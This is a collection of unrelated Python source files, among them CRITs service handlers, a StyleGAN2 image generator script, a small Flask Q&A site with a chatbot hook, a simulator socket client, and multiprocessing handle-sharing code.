if ar:
AnalysisResult.objects(id=ar.id).update_one(push_all__results=final_list)
res['success'] = True
return res
def add_log(object_type, object_id, analysis_id, log_message, level, analyst):
"""
Add a log entry to an analysis task.
:param object_type: The top-level object type.
:type object_type: str
:param object_id: The ObjectId to search for.
:type object_id: str
:param analysis_id: The ID of the task to update.
:type analysis_id: str
:param log_message: The log entry to append.
:type log_message: dict
:param level: The log level.
:type level: str
:param analyst: The user updating the log.
:type analyst: str
:returns: dict with keys "success" (boolean) and "message" (str) if failed.
"""
results = {'success': False}
if not object_type or not object_id or not analysis_id:
results['message'] = "Must supply object id/type and analysis id."
return results
# Validate user can add service results to this TLO.
klass = class_from_type(object_type)
sources = user_sources(analyst)
obj = klass.objects(id=object_id, source__name__in=sources).first()
if not obj:
results['message'] = "Could not find object to add results to."
return results
# Update analysis log
le = EmbeddedAnalysisResultLog()
le.message = log_message
le.level = level
le.datetime = str(datetime.datetime.now())
ar = AnalysisResult.objects(analysis_id=analysis_id).first()
if ar:
AnalysisResult.objects(id=ar.id).update_one(push__log=le)
results['success'] = True
else:
results['message'] = "Could not find task to add log to."
return results
def finish_task(object_type, object_id, analysis_id, status, analyst):
"""
Finish a task by setting its status to "completed" and setting the finish
date.
:param object_type: The top-level object type.
:type object_type: str
:param object_id: The ObjectId to search for.
:type object_id: str
:param analysis_id: The ID of the task to update.
:type analysis_id: str
:param status: The status of the task.
:type status: str ("error", "completed")
:param analyst: The user updating the log.
:type analyst: str
:returns: dict with keys "success" (boolean) and "message" (str) if failed.
"""
results = {'success': False}
if not status:
status = "completed"
if status not in ('error', 'completed'):
status = "completed"
if not object_type or not object_id or not analysis_id:
results['message'] = "Must supply object id/type and analysis id."
return results
# Validate user can add service results to this TLO.
klass = class_from_type(object_type)
sources = user_sources(analyst)
obj = klass.objects(id=object_id, source__name__in=sources).first()
if not obj:
results['message'] = "Could not find object to add results to."
return results
# Update analysis log
date = str(datetime.datetime.now())
ar = AnalysisResult.objects(analysis_id=analysis_id).first()
if ar:
AnalysisResult.objects(id=ar.id).update_one(set__status=status,
set__finish_date=date)
results['success'] = True
return results
def update_config(service_name, config, analyst):
"""
Update the configuration for a service.
"""
service = CRITsService.objects(name=service_name).first()
service.config = AnalysisConfig(**config)
try:
#TODO: get/validate the config from service author to set status
#update_status(service_name)
service.save(username=analyst)
return {'success': True}
except ValidationError, e:
return {'success': False, 'message': e}
def get_service_config(name):
status = {'success': False}
service = CRITsService.objects(name=name, status__ne="unavailable").first()
if not service:
status['error'] = 'Service "%s" is unavailable. Please review error logs.' % name
return status
config = service.config.to_dict()
service_class = crits.services.manager.get_service_class(name)
if not service_class:
status['error'] = 'Service "%s" is unavilable. Please review error logs.' % name
return status
display_config = service_class.get_config_details(config)
status['config'] = display_config
status['config_error'] = _get_config_error(service)
# TODO: fix code so we don't have to do this
status['service'] = service.to_dict()
status['success'] = True
return status
def _get_config_error(service):
"""
Return a string describing the error in the service configuration.
Returns None if there are no errors.
"""
error = None
name = service['name']
config = service['config']
if service['status'] == 'misconfigured':
service_class = crits.services.manager.get_service_class(name)
try:
service_class.parse_config(config.to_dict())
except Exception as e:
error = str(e)
return error
def do_edit_config(name, analyst, post_data=None):
status = {'success': False}
service = CRITsService.objects(name=name, status__ne="unavailable").first()
if not service:
status['config_error'] = 'Service "%s" is unavailable. Please review error logs.' % name
status['form'] = ''
status['service'] = ''
return status
# Get the class that implements this service.
service_class = crits.services.manager.get_service_class(name)
config = service.config.to_dict()
cfg_form, html = service_class.generate_config_form(config)
# This isn't a form object. It's the HTML.
status['form'] = html
status['service'] = service
if post_data:
#Populate the form with values from the POST request
form = cfg_form(post_data)
if form.is_valid():
try:
service_class.parse_config(form.cleaned_data)
except ServiceConfigError as e:
service.status = 'misconfigured'
service.save()
status['config_error'] = str(e)
return status
result = update_config(name, form.cleaned_data, analyst)
if not result['success']:
return status
service.status = 'available'
service.save()
else:
status['config_error'] = form.errors
return status
status['success'] = True
return status
def get_config(service_name):
"""
Get the configuration for a service.
"""
service = CRITsService.objects(name=service_name).first()
if not service:
return None
return service.config
def set_enabled(service_name, enabled=True, analyst=None):
"""
Enable/disable a service in CRITs.
"""
if enabled:
logger.info("Enabling: %s" % service_name)
else:
logger.info("Disabling: %s" % service_name)
service = CRITsService.objects(name=service_name).first()
service.enabled = enabled
try:
service.save(username=analyst)
if enabled:
url = reverse('crits.services.views.disable', args=(service_name,))
else:
url = reverse('crits.services.views.enable', args=(service_name,))
return {'success': True, 'url': url}
except ValidationError, e:
return {'success': False, 'message': e}
def set_triage(service_name, enabled=True, analyst=None):
"""
Enable/disable a service for running on triage (upload).
"""
if enabled:
logger.info("Enabling triage: %s" % service_name)
else:
logger.info("Disabling triage: %s" % service_name)
service = CRITsService.objects(name=service_name).first()
service.run_on_triage = enabled
try:
service.save(username=analyst)
if enabled:
url = reverse('crits.services.views.disable_triage',
args=(service_name,))
else:
url = reverse('crits.services.views.enable_triage',
args=(service_name,))
return {'success': True, 'url': url}
except ValidationError, e:
return {'success': False,
'message': e}
def enabled_services(status=True):
"""
Return names of services which are enabled.
"""
if status:
services = CRITsService.objects(enabled=True,
status="available")
else:
services = CRITsService.objects(enabled=True)
return [s.name for s in services]
def get_supported_services(crits_type):
"""
Get the supported services for a type.
"""
services = CRITsService.objects(enabled=True)
for s in sorted(services, key=lambda s: s.name.lower()):
if s.supported_types == 'all' or crits_type in s.supported_types:
yield s.name
def triage_services(status=True):
"""
Return names of services set to run on triage.
"""
if status:
services = CRITsService.objects(run_on_triage=True,
status="available")
else:
services = CRITsService.objects(run_on_triage=True)
return [s.name for s in services]
def delete_analysis(task_id, analyst):
"""
Delete analysis results.
"""
ar = AnalysisResult.objects(id=task_id).first()
if ar:
ar.delete(username=analyst)
def insert_analysis_results(task):
"""
Insert analysis results for this task.
"""
ar = AnalysisResult()
tdict = task.to_dict()
tdict['analysis_id'] = tdict['id']
del tdict['id']
ar.merge(arg_dict=tdict)
ar.save()
def update_analysis_results(task):
"""
Update analysis results for this task.
"""
# If the task does not currently exist for the given sample in the
# database, add it.
found = False
ar = AnalysisResult.objects(analysis_id=task.task_id).first()
if ar:
found = True
if not found:
logger.warning("Tried to update a task that didn't exist.")
insert_analysis_results(task)
else:
# Otherwise, update it.
tdict = task.to_dict()
tdict['analysis_id'] = tdict['id']
del tdict['id']
#TODO: find a better way to do this.
new_dict = {}
for k in tdict.iterkeys():
new_dict['set__%s' % k] = tdict[k]
try:
AnalysisResult.objects(id=ar.id).update_one(**new_dict)
except Exception as e: # assume bad data in 'results'
task.status = 'error'
new_dict['set__results'] = []
le = EmbeddedAnalysisResultLog()
le.message = 'DB Update Failed: %s' % e
le.level = 'error'
le.datetime = str(datetime.datetime.now())
new_dict['set__log'].append(le)
try:
AnalysisResult.objects(id=ar.id).update_one(**new_dict)
except: # don't know what's wrong, try writing basic log only
AnalysisResult.objects(id=ar.id).update_one(set__log=[le])
# The service pools need to be defined down here because the functions
# that are used by the services must already be defined.
if settings.SERVICE_MODEL == 'thread_pool':
__service_thread_pool__ = ThreadPool(processes=settings.SERVICE_POOL_SIZE)
__service_process_pool__ = None
elif settings.SERVICE_MODEL == 'process_pool':
__service_thread_pool__ = None
__service_process_pool__ = Pool(processes=settings.SERVICE_POOL_SIZE)
else:
__service_thread_pool__ = None
__service_process_pool__ = None
|
main.py
|
from message_board import MSGBoard
from node import Actor
def foo(bar, baz, nay):
return bar + baz + nay
def bar():
return 3
def baz():
return 30
def kay():
return 300
def jay():
return 3000
def nay(kay, jay):
return kay + jay
def show(foo):
print(foo)
return True
def shutdown():
import sys
print('shutting down')
sys.exit()
exit()
def get_actor():
frame_infos = inspect.stack() # A list of FrameInfo.
frame = frame_infos[1].frame # The frame of the caller.
locs = frame.f_locals # The caller's locals dict.
return locs['self']
def change_msg_board(get_actor, get_second_msg_board):
get_actor.set_messageboard(get_second_msg_board.name)
def get_second_msg_board(get_actor):
return get_actor.msgboards[1]
def print_something(get_second_msg_board):
print(get_second_msg_board.name)
return get_second_msg_board
# def user_input():
# import threading
# import time
# import sys
#
# def background():
# while True:
# time.sleep(3)
# print('disarm me by typing disarm')
#
#
# def show_trigger():
# .msgboards.append(msgboard)
#
# new_id = thoughts.produce_id()
# message = {'id': new_id, 'ref_id': new_id, 'request': 'show'}
# actor_user.say(message, thoughts)
#
# # now threading1 runs regardless of user input
# threading1 = threading.Thread(target=background)
# threading1.daemon = True
# threading1.start()
#
# while True:
# if input() == 'disarm':
# show_trigger()
# sys.exit()
# else:
# print('not disarmed')
# these function details could be deduced from their signature instead of made explicit...
actor_foo = Actor(verbose=True)
actor_kay = Actor(verbose=True)
actor_user = Actor(accepts_user_input=True, verbose=True)
thoughts = MSGBoard('thoughts')
words = MSGBoard('words')
actor_foo.listen(thoughts)
actor_kay.listen(thoughts)
actor_user.listen(thoughts)
actor_user.add_functions(functions=[show, shutdown])
actor_foo.add_functions(functions=[foo, baz, shutdown])
actor_kay.add_functions(functions=[bar, kay, jay, nay, shutdown])
actor_foo.add_trigger(cause='show', effect='foo')
|
run_generator.py
|
# Copyright (c) 2019, NVIDIA Corporation. All rights reserved.
#
# This work is made available under the Nvidia Source Code License-NC.
# To view a copy of this license, visit
# https://nvlabs.github.io/stylegan2/license.html
import argparse
import numpy as np
import PIL.Image
import dnnlib
import dnnlib.tflib as tflib
import re
import sys
from multiprocessing import cpu_count
from queue import Queue
from io import BytesIO
from threading import Thread
import pretrained_networks
#----------------------------------------------------------------------------
NUM_THREADS = cpu_count()
# ----------------------------------------------------------------------------
def generate_images(network_pkl, seeds, truncation_psi):
# The thread and thread function should be local because `generate_images` function is running on another thread
image_queue = Queue(maxsize=100)
io_queue = Queue(maxsize=100)
# Thread function: convert image data into image buffer
def T_parse_image():
while True:
item = image_queue.get()
if item is None:
io_queue.put(None)
break
else:
im, path = item
im = PIL.Image.fromarray(im, 'RGB')
io = BytesIO()
im.save(io, format='png')
io_queue.put((io, path))
# Thread function: save image buffer into file
# It's better to do IO works in one thread especially when it's on HDD
def T_save_image():
none_cnt = 0
while True:
item = io_queue.get()
if item is None:
none_cnt += 1
if none_cnt == NUM_THREADS:
break
else:
io, path = item
print(path)
with open(path, 'wb') as f:
f.write(io.getvalue())
io.close()
# Create image saver threads
print('Create', NUM_THREADS, 'threads')
image_threads = []
for i in range(NUM_THREADS):
t = Thread(target=T_parse_image, name=f'ImageSaver_{i}', daemon=True)
image_threads.append(t)
t.start()
io_thread = Thread(target=T_save_image, name='ThreadImageSaver', daemon=True)
io_thread.start()
print('Loading networks from "%s"...' % network_pkl)
_G, _D, Gs = pretrained_networks.load_networks(network_pkl)
noise_vars = [var for name, var in Gs.components.synthesis.vars.items() if name.startswith('noise')]
Gs_kwargs = dnnlib.EasyDict()
Gs_kwargs.output_transform = dict(func=tflib.convert_images_to_uint8, nchw_to_nhwc=True)
Gs_kwargs.randomize_noise = False
if truncation_psi is not None:
Gs_kwargs.truncation_psi = truncation_psi
for seed_idx, seed in enumerate(seeds):
rnd = np.random.RandomState(seed)
z = rnd.randn(1, *Gs.input_shape[1:]) # [minibatch, component]
tflib.set_vars({var: rnd.randn(*var.shape.as_list()) for var in noise_vars}) # [height, width]
images = Gs.run(z, None, **Gs_kwargs) # [minibatch, height, width, channel]
filepath = dnnlib.make_run_dir_path('seed%06d.png' % seed)
image_queue.put((images[0], filepath))
# Close threads
for _ in range(NUM_THREADS):
image_queue.put(None)
for t in image_threads:
t.join()
io_thread.join()
print('done')
#----------------------------------------------------------------------------
def style_mixing_example(network_pkl, row_seeds, col_seeds, truncation_psi, col_styles, minibatch_size=4):
print('Loading networks from "%s"...' % network_pkl)
_G, _D, Gs = pretrained_networks.load_networks(network_pkl)
w_avg = Gs.get_var('dlatent_avg') # [component]
Gs_syn_kwargs = dnnlib.EasyDict()
Gs_syn_kwargs.output_transform = dict(func=tflib.convert_images_to_uint8, nchw_to_nhwc=True)
Gs_syn_kwargs.randomize_noise = False
Gs_syn_kwargs.minibatch_size = minibatch_size
print('Generating W vectors...')
all_seeds = list(set(row_seeds + col_seeds))
all_z = np.stack([np.random.RandomState(seed).randn(*Gs.input_shape[1:]) for seed in all_seeds]) # [minibatch, component]
all_w = Gs.components.mapping.run(all_z, None) # [minibatch, layer, component]
all_w = w_avg + (all_w - w_avg) * truncation_psi # [minibatch, layer, component]
w_dict = {seed: w for seed, w in zip(all_seeds, list(all_w))} # [layer, component]
print('Generating images...')
all_images = Gs.components.synthesis.run(all_w, **Gs_syn_kwargs) # [minibatch, height, width, channel]
image_dict = {(seed, seed): image for seed, image in zip(all_seeds, list(all_images))}
print('Generating style-mixed images...')
for row_seed in row_seeds:
for col_seed in col_seeds:
w = w_dict[row_seed].copy()
w[col_styles] = w_dict[col_seed][col_styles]
image = Gs.components.synthesis.run(w[np.newaxis], **Gs_syn_kwargs)[0]
image_dict[(row_seed, col_seed)] = image
print('Saving images...')
for (row_seed, col_seed), image in image_dict.items():
PIL.Image.fromarray(image, 'RGB').save(dnnlib.make_run_dir_path('%d-%d.png' % (row_seed, col_seed)))
print('Saving image grid...')
_N, _C, H, W = Gs.output_shape
canvas = PIL.Image.new('RGB', (W * (len(col_seeds) + 1), H * (len(row_seeds) + 1)), 'black')
for row_idx, row_seed in enumerate([None] + row_seeds):
for col_idx, col_seed in enumerate([None] + col_seeds):
if row_seed is None and col_seed is None:
continue
key = (row_seed, col_seed)
if row_seed is None:
key = (col_seed, col_seed)
if col_seed is None:
key = (row_seed, row_seed)
canvas.paste(PIL.Image.fromarray(image_dict[key], 'RGB'), (W * col_idx, H * row_idx))
canvas.save(dnnlib.make_run_dir_path('grid.png'))
#----------------------------------------------------------------------------
def _parse_num_range(s):
'''Accept either a comma separated list of numbers 'a,b,c' or a range 'a-c' and return as a list of ints.'''
range_re = re.compile(r'^(\d+)-(\d+)$')
m = range_re.match(s)
if m:
return list(range(int(m.group(1)), int(m.group(2))+1))
vals = s.split(',')
return [int(x) for x in vals]
#----------------------------------------------------------------------------
_examples = '''examples:
# Generate ffhq uncurated images (matches paper Figure 12)
python %(prog)s generate-images --network=gdrive:networks/stylegan2-ffhq-config-f.pkl --seeds=6600-6625 --truncation-psi=0.5
# Generate ffhq curated images (matches paper Figure 11)
python %(prog)s generate-images --network=gdrive:networks/stylegan2-ffhq-config-f.pkl --seeds=66,230,389,1518 --truncation-psi=1.0
# Generate uncurated car images (matches paper Figure 12)
python %(prog)s generate-images --network=gdrive:networks/stylegan2-car-config-f.pkl --seeds=6000-6025 --truncation-psi=0.5
# Generate style mixing example (matches style mixing video clip)
python %(prog)s style-mixing-example --network=gdrive:networks/stylegan2-ffhq-config-f.pkl --row-seeds=85,100,75,458,1500 --col-seeds=55,821,1789,293 --truncation-psi=1.0
'''
#----------------------------------------------------------------------------
def main():
parser = argparse.ArgumentParser(
description='''StyleGAN2 generator.
Run 'python %(prog)s <subcommand> --help' for subcommand help.''',
epilog=_examples,
formatter_class=argparse.RawDescriptionHelpFormatter
)
subparsers = parser.add_subparsers(help='Sub-commands', dest='command')
parser_generate_images = subparsers.add_parser('generate-images', help='Generate images')
parser_generate_images.add_argument('--network', help='Network pickle filename', dest='network_pkl', required=True)
parser_generate_images.add_argument('--seeds', type=_parse_num_range, help='List of random seeds', required=True)
parser_generate_images.add_argument('--truncation-psi', type=float, help='Truncation psi (default: %(default)s)', default=0.5)
parser_generate_images.add_argument('--result-dir', help='Root directory for run results (default: %(default)s)', default='results', metavar='DIR')
parser_style_mixing_example = subparsers.add_parser('style-mixing-example', help='Generate style mixing video')
parser_style_mixing_example.add_argument('--network', help='Network pickle filename', dest='network_pkl', required=True)
parser_style_mixing_example.add_argument('--row-seeds', type=_parse_num_range, help='Random seeds to use for image rows', required=True)
parser_style_mixing_example.add_argument('--col-seeds', type=_parse_num_range, help='Random seeds to use for image columns', required=True)
parser_style_mixing_example.add_argument('--col-styles', type=_parse_num_range, help='Style layer range (default: %(default)s)', default='0-6')
parser_style_mixing_example.add_argument('--truncation-psi', type=float, help='Truncation psi (default: %(default)s)', default=0.5)
parser_style_mixing_example.add_argument('--result-dir', help='Root directory for run results (default: %(default)s)', default='results', metavar='DIR')
args = parser.parse_args()
kwargs = vars(args)
subcmd = kwargs.pop('command')
if subcmd is None:
print ('Error: missing subcommand. Re-run with --help for usage.')
sys.exit(1)
sc = dnnlib.SubmitConfig()
sc.num_gpus = 1
sc.submit_target = dnnlib.SubmitTarget.LOCAL
sc.local.do_not_copy_source_files = True
sc.run_dir_root = kwargs.pop('result_dir')
sc.run_desc = subcmd
func_name_map = {
'generate-images': 'run_generator.generate_images',
'style-mixing-example': 'run_generator.style_mixing_example'
}
dnnlib.submit_run(sc, func_name_map[subcmd], **kwargs)
#----------------------------------------------------------------------------
if __name__ == "__main__":
main()
#----------------------------------------------------------------------------
|
app.py
|
#encoding: utf-8
from flask import Flask
from exts import db
import flask
import config
from forms import RegistForm
from models import UserModel,QuestionModel,AnswerModel
from decorators import login_required
from sqlalchemy import or_
import json,requests
import os
from threading import Thread
def async(f):
def wrapper(*args, **kwargs):
thr = Thread(target = f, args = args, kwargs = kwargs)
thr.start()
return wrapper
@async
def autoRobotAnswer(id, question_model):
pid = os.fork()
if pid != 0:
return
url = "http://47.104.98.154:8080/anonymous/wordManage/wenda"
headers = {'content-type': "application/json"}
query_string = {"question": question_model.title, "robotid": "1791"}
if (len(question_model.answers) < 1):
response = requests.post(url, data=json.dumps(query_string), headers=headers)
jstr = response.text
# error : {"result":false,"message":"服务器处理异常!","data":null}
print jstr
if (jstr['message'] == 'success'):
print jstr['message']
question_id = id
print question_id
content = jstr['data']['answers']
print content
answer_model = AnswerModel(content=content)
answer_model.author = 'robot'
answer_model.question = question_model
db.session.add(answer_model)
db.session.commit()
app = Flask(__name__)
app.config.from_object(config)
db.init_app(app)
@app.route('/')
def index():
context = {
'questions': QuestionModel.query.all()
}
return flask.render_template('index.html',**context)
@app.route('/question/',methods=['GET','POST'])
@login_required
def question():
if flask.request.method == 'GET':
return flask.render_template('question.html')
else:
title = flask.request.form.get('title')
content = flask.request.form.get('content')
question_model = QuestionModel(title=title,content=content)
question_model.author = flask.g.user
db.session.add(question_model)
db.session.commit()
return flask.redirect(flask.url_for('index'))
@app.route('/d/<id>/')
def detail(id):
question_model = QuestionModel.query.get(id)
# add aotubot
autoRobotAnswer(id, question_model)
# end autobot
return flask.render_template('detail.html',question=question_model)
@app.route('/comment/',methods=['POST'])
@login_required
def comment():
question_id = flask.request.form.get('question_id')
content = flask.request.form.get('content')
answer_model = AnswerModel(content=content)
answer_model.author = flask.g.user
answer_model.question = QuestionModel.query.get(question_id)
db.session.add(answer_model)
db.session.commit()
return flask.redirect(flask.url_for('detail',id=question_id))
@app.route('/search/')
def search():
q = flask.request.args.get('q')
questions = QuestionModel.query.filter(or_(QuestionModel.title.contains(q),QuestionModel.content.contains(q)))
context = {
'questions': questions
}
return flask.render_template('index.html',**context)
@app.route('/login/',methods=['GET','POST'])
def login():
if flask.request.method == 'GET':
return flask.render_template('login.html')
else:
telephone = flask.request.form.get('telephone')
password = flask.request.form.get('password')
user = UserModel.query.filter_by(telephone=telephone).first()
if user and user.check_password(password):
flask.session['id'] = user.id
flask.g.user = user
return flask.redirect(flask.url_for('index'))
else:
return u'用户名或密码错误!'
@app.route('/logout/',methods=['GET'])
def logout():
flask.session.clear()
return flask.redirect(flask.url_for('login'))
@app.route('/regist/',methods=['GET','POST'])
def regist():
if flask.request.method == 'GET':
return flask.render_template('regist.html')
else:
form = RegistForm(flask.request.form)
if form.validate():
telephone = form.telephone.data
username = form.username.data
password = form.password1.data
user = UserModel(telephone=telephone,username=username,password=password)
db.session.add(user)
db.session.commit()
return flask.redirect(flask.url_for('login'))
@app.before_request
def before_request():
id = flask.session.get('id')
if id:
user = UserModel.query.get(id)
flask.g.user = user
@app.context_processor
def context_processor():
if hasattr(flask.g,'user'):
return {"user":flask.g.user}
else:
return {}
if __name__ == '__main__':
app.run(port=9000)
|
client.py
|
"""
SDClient
A base class for interacting with the sdsim simulator as server.
The server will create on vehicle per client connection. The client
will then interact by createing json message to send to the server.
The server will reply with telemetry and other status messages in an
asynchronous manner.
Author: Tawn Kramer
"""
import json
import logging
import select
import socket
import time
from threading import Thread
from .util import replace_float_notation
logger = logging.getLogger(__name__)
class SDClient:
def __init__(self, host, port, poll_socket_sleep_time=0.05):
self.msg = None
self.host = host
self.port = port
self.poll_socket_sleep_sec = poll_socket_sleep_time
self.th = None
# the aborted flag will be set when we have detected a problem with the socket
# that we can't recover from.
self.aborted = False
self.connect()
def connect(self):
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connecting to the server
logger.info("connecting to %s:%d " % (self.host, self.port))
try:
self.s.connect((self.host, self.port))
except ConnectionRefusedError:
raise (
Exception(
"Could not connect to server. Is it running? "
"If you specified 'remote', then you must start it manually."
)
)
# time.sleep(pause_on_create)
self.do_process_msgs = True
self.th = Thread(target=self.proc_msg, args=(self.s,), daemon=True)
self.th.start()
def send(self, m):
self.msg = m
def send_now(self, msg):
logger.debug("send_now:" + msg)
self.s.sendall(msg.encode("utf-8"))
def on_msg_recv(self, j):
logger.debug("got:" + j["msg_type"])
def stop(self):
# signal proc_msg loop to stop, then wait for thread to finish
# close socket
self.do_process_msgs = False
if self.th is not None:
self.th.join()
if self.s is not None:
self.s.close()
def proc_msg(self, sock): # noqa: C901
"""
This is the thread message loop to process messages.
We will send any message that is queued via the self.msg variable
when our socket is in a writable state.
And we will read any messages when it's in a readable state and then
call self.on_msg_recv with the json object message.
"""
sock.setblocking(0)
inputs = [sock]
outputs = [sock]
localbuffer = ""
while self.do_process_msgs:
# without this sleep, I was getting very consistent socket errors
# on Windows. Perhaps we don't need this sleep on other platforms.
time.sleep(self.poll_socket_sleep_sec)
try:
# test our socket for readable, writable states.
readable, writable, exceptional = select.select(inputs, outputs, inputs)
for s in readable:
try:
data = s.recv(1024 * 256)
except ConnectionAbortedError:
logger.warn("socket connection aborted")
print("socket connection aborted")
self.do_process_msgs = False
break
# we don't technically need to convert from bytes to string
# for json.loads, but we do need a string in order to do
# the split by \n newline char. This seperates each json msg.
data = data.decode("utf-8")
localbuffer += data
n0 = localbuffer.find("{")
n1 = localbuffer.rfind("}\n")
if n1 >= 0 and 0 <= n0 < n1: # there is at least one message :
msgs = localbuffer[n0 : n1 + 1].split("\n")
localbuffer = localbuffer[n1:]
for m in msgs:
if len(m) <= 2:
continue
# Replace comma with dots for floats
# useful when using unity in a language different from English
m = replace_float_notation(m)
try:
j = json.loads(m)
except Exception as e:
logger.error("Exception:" + str(e))
logger.error("json: " + m)
continue
if "msg_type" not in j:
logger.error("Warning expected msg_type field")
logger.error("json: " + m)
continue
else:
self.on_msg_recv(j)
for s in writable:
if self.msg is not None:
logger.debug("sending " + self.msg)
s.sendall(self.msg.encode("utf-8"))
self.msg = None
if len(exceptional) > 0:
logger.error("problems w sockets!")
except Exception as e:
print("Exception:", e)
self.aborted = True
self.on_msg_recv({"msg_type": "aborted"})
break
|
reduction.py
|
#
# Module to allow connection and socket objects to be transferred
# between processes
#
# multiprocessing/reduction.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
__all__ = ['reduce_socket', 'reduce_connection', 'send_handle', 'recv_handle']
import os
import sys
import socket
import threading
import struct
import signal
from multiprocess import current_process
from multiprocess.util import register_after_fork, debug, sub_debug
from multiprocess.util import is_exiting, sub_warning
#
#
#
if not(sys.platform == 'win32' or (hasattr(socket, 'CMSG_LEN') and
hasattr(socket, 'SCM_RIGHTS'))):
raise ImportError('pickling of connections not supported')
#
# Platform specific definitions
#
if sys.platform == 'win32':
# Windows
__all__ += ['reduce_pipe_connection']
import _winapi
def send_handle(conn, handle, destination_pid):
dh = DupHandle(handle, _winapi.DUPLICATE_SAME_ACCESS, destination_pid)
conn.send(dh)
def recv_handle(conn):
return conn.recv().detach()
class DupHandle(object):
def __init__(self, handle, access, pid=None):
# duplicate handle for process with given pid
if pid is None:
pid = os.getpid()
proc = _winapi.OpenProcess(_winapi.PROCESS_DUP_HANDLE, False, pid)
try:
self._handle = _winapi.DuplicateHandle(
_winapi.GetCurrentProcess(),
handle, proc, access, False, 0)
finally:
_winapi.CloseHandle(proc)
self._access = access
self._pid = pid
def detach(self):
# retrieve handle from process which currently owns it
if self._pid == os.getpid():
return self._handle
proc = _winapi.OpenProcess(_winapi.PROCESS_DUP_HANDLE, False,
self._pid)
try:
return _winapi.DuplicateHandle(
proc, self._handle, _winapi.GetCurrentProcess(),
self._access, False, _winapi.DUPLICATE_CLOSE_SOURCE)
finally:
_winapi.CloseHandle(proc)
class DupSocket(object):
def __init__(self, sock):
new_sock = sock.dup()
def send(conn, pid):
share = new_sock.share(pid)
conn.send_bytes(share)
self._id = resource_sharer.register(send, new_sock.close)
def detach(self):
conn = resource_sharer.get_connection(self._id)
try:
share = conn.recv_bytes()
return socket.fromshare(share)
finally:
conn.close()
def reduce_socket(s):
return rebuild_socket, (DupSocket(s),)
def rebuild_socket(ds):
return ds.detach()
def reduce_connection(conn):
handle = conn.fileno()
with socket.fromfd(handle, socket.AF_INET, socket.SOCK_STREAM) as s:
ds = DupSocket(s)
return rebuild_connection, (ds, conn.readable, conn.writable)
def rebuild_connection(ds, readable, writable):
from .connection import Connection
sock = ds.detach()
return Connection(sock.detach(), readable, writable)
def reduce_pipe_connection(conn):
access = ((_winapi.FILE_GENERIC_READ if conn.readable else 0) |
(_winapi.FILE_GENERIC_WRITE if conn.writable else 0))
dh = DupHandle(conn.fileno(), access)
return rebuild_pipe_connection, (dh, conn.readable, conn.writable)
def rebuild_pipe_connection(dh, readable, writable):
from .connection import PipeConnection
handle = dh.detach()
return PipeConnection(handle, readable, writable)
else:
# Unix
# On MacOSX we should acknowledge receipt of fds -- see Issue14669
ACKNOWLEDGE = sys.platform == 'darwin'
def send_handle(conn, handle, destination_pid):
with socket.fromfd(conn.fileno(), socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.sendmsg([b'x'], [(socket.SOL_SOCKET, socket.SCM_RIGHTS,
struct.pack("@i", handle))])
if ACKNOWLEDGE and conn.recv_bytes() != b'ACK':
raise RuntimeError('did not receive acknowledgement of fd')
def recv_handle(conn):
size = struct.calcsize("@i")
with socket.fromfd(conn.fileno(), socket.AF_UNIX, socket.SOCK_STREAM) as s:
msg, ancdata, flags, addr = s.recvmsg(1, socket.CMSG_LEN(size))
try:
if ACKNOWLEDGE:
conn.send_bytes(b'ACK')
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
if (cmsg_level == socket.SOL_SOCKET and
cmsg_type == socket.SCM_RIGHTS):
return struct.unpack("@i", cmsg_data[:size])[0]
except (ValueError, IndexError, struct.error):
pass
raise RuntimeError('Invalid data received')
class DupFd(object):
def __init__(self, fd):
new_fd = os.dup(fd)
def send(conn, pid):
send_handle(conn, new_fd, pid)
def close():
os.close(new_fd)
self._id = resource_sharer.register(send, close)
def detach(self):
conn = resource_sharer.get_connection(self._id)
try:
return recv_handle(conn)
finally:
conn.close()
def reduce_socket(s):
df = DupFd(s.fileno())
return rebuild_socket, (df, s.family, s.type, s.proto)
def rebuild_socket(df, family, type, proto):
fd = df.detach()
s = socket.fromfd(fd, family, type, proto)
os.close(fd)
return s
def reduce_connection(conn):
df = DupFd(conn.fileno())
return rebuild_connection, (df, conn.readable, conn.writable)
def rebuild_connection(df, readable, writable):
from .connection import Connection
fd = df.detach()
return Connection(fd, readable, writable)
#
# Server which shares registered resources with clients
#
class ResourceSharer(object):
def __init__(self):
self._key = 0
self._cache = {}
self._old_locks = []
self._lock = threading.Lock()
self._listener = None
self._address = None
self._thread = None
register_after_fork(self, ResourceSharer._afterfork)
def register(self, send, close):
with self._lock:
if self._address is None:
self._start()
self._key += 1
self._cache[self._key] = (send, close)
return (self._address, self._key)
@staticmethod
def get_connection(ident):
from .connection import Client
address, key = ident
c = Client(address, authkey=current_process().authkey)
c.send((key, os.getpid()))
return c
def stop(self, timeout=None):
from .connection import Client
with self._lock:
if self._address is not None:
c = Client(self._address, authkey=current_process().authkey)
c.send(None)
c.close()
self._thread.join(timeout)
if self._thread.is_alive():
sub_warn('ResourceSharer thread did not stop when asked')
self._listener.close()
self._thread = None
self._address = None
self._listener = None
for key, (send, close) in self._cache.items():
close()
self._cache.clear()
def _afterfork(self):
for key, (send, close) in self._cache.items():
close()
self._cache.clear()
# If self._lock was locked at the time of the fork, it may be broken
# -- see issue 6721. Replace it without letting it be gc'ed.
self._old_locks.append(self._lock)
self._lock = threading.Lock()
if self._listener is not None:
self._listener.close()
self._listener = None
self._address = None
self._thread = None
def _start(self):
from .connection import Listener
assert self._listener is None
debug('starting listener and thread for sending handles')
self._listener = Listener(authkey=current_process().authkey)
self._address = self._listener.address
t = threading.Thread(target=self._serve)
t.daemon = True
t.start()
self._thread = t
def _serve(self):
if hasattr(signal, 'pthread_sigmask'):
signal.pthread_sigmask(signal.SIG_BLOCK, range(1, signal.NSIG))
while 1:
try:
conn = self._listener.accept()
msg = conn.recv()
if msg is None:
break
key, destination_pid = msg
send, close = self._cache.pop(key)
send(conn, destination_pid)
close()
conn.close()
except:
if not is_exiting():
import traceback
sub_warning(
'thread for sharing handles raised exception :\n' +
'-'*79 + '\n' + traceback.format_exc() + '-'*79
)
resource_sharer = ResourceSharer()
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "Hello, I am alive!"
def run():
app.run(host='0.0.0.0',port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
|
server.py
|
import subprocess
import threading
from os import system
from time import sleep
# Open new process opening bedrock_server.exe that pipes input and output here
